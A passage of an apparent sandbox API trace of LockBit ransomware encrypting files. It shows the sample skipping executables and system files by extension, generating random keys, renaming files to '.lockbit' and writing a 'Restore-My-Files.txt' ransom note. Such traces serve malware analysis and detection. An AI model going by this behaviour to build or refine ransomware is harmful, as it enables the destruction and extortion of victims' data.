dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.602] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.602] malloc (_Size=0x40068) returned 0x3df0008 [0153.602] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5096) returned 1 [0153.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.693] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.733] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.733] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.734] free (_Block=0x1fa2ed8) [0153.734] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.734] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.734] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239975.WMF", cAlternateFileName="")) returned 1 [0153.735] lstrcmpiW (lpString1=".", lpString2="J0239975.WMF") returned -1 [0153.735] lstrcmpiW (lpString1="..", lpString2="J0239975.WMF") returned -1 [0153.735] PathFindExtensionW (pszPath="J0239975.WMF") returned=".WMF" [0153.735] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.735] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.736] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.736] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239975.WMF") returned 1 [0153.737] lstrcmpiW (lpString1="ntldr", lpString2="J0239975.WMF") returned 1 [0153.737] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239975.WMF") returned 1 [0153.737] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239975.WMF") returned -1 [0153.737] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239975.WMF") returned -1 [0153.737] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239975.WMF") returned 1 [0153.737] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239975.WMF") returned -1 [0153.737] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.737] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF") returned=".WMF" [0153.737] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.737] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.737] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.738] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.738] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF.lockbit") returned 72 [0153.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239975.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0153.740] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.740] malloc (_Size=0x40068) returned 0x1ff1e60 [0153.740] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3488) returned 1 [0153.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0153.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0153.741] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0153.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.755] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.755] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.757] free (_Block=0x1fa2ed8) [0153.757] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239975.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.757] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.757] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.757] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xcd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239997.WMF", cAlternateFileName="")) returned 1 [0153.757] lstrcmpiW (lpString1=".", lpString2="J0239997.WMF") returned -1 [0153.757] lstrcmpiW (lpString1="..", lpString2="J0239997.WMF") returned -1 [0153.757] PathFindExtensionW (pszPath="J0239997.WMF") returned=".WMF" [0153.757] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.757] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.758] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.758] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.759] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239997.WMF") returned 1 [0153.759] lstrcmpiW (lpString1="ntldr", lpString2="J0239997.WMF") returned 1 [0153.759] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239997.WMF") returned 1 [0153.759] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239997.WMF") returned -1 [0153.760] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239997.WMF") returned -1 [0153.760] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239997.WMF") returned 1 [0153.760] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239997.WMF") returned -1 [0153.760] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.760] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF") returned=".WMF" [0153.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.760] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.760] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.761] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.761] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF.lockbit") returned 72 [0153.761] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239997.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0153.763] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.763] malloc (_Size=0x40068) returned 0x3d70450 [0153.763] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3288) returned 1 [0153.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0153.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0153.764] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0153.766] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.766] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.767] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.768] free (_Block=0x1fa2ed8) [0153.768] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239997.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.768] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.768] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.768] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0240157.WMF", cAlternateFileName="")) returned 1 [0153.768] lstrcmpiW (lpString1=".", lpString2="J0240157.WMF") returned -1 [0153.768] lstrcmpiW (lpString1="..", lpString2="J0240157.WMF") returned -1 [0153.768] PathFindExtensionW (pszPath="J0240157.WMF") returned=".WMF" [0153.768] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.769] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.770] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.770] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".sys", 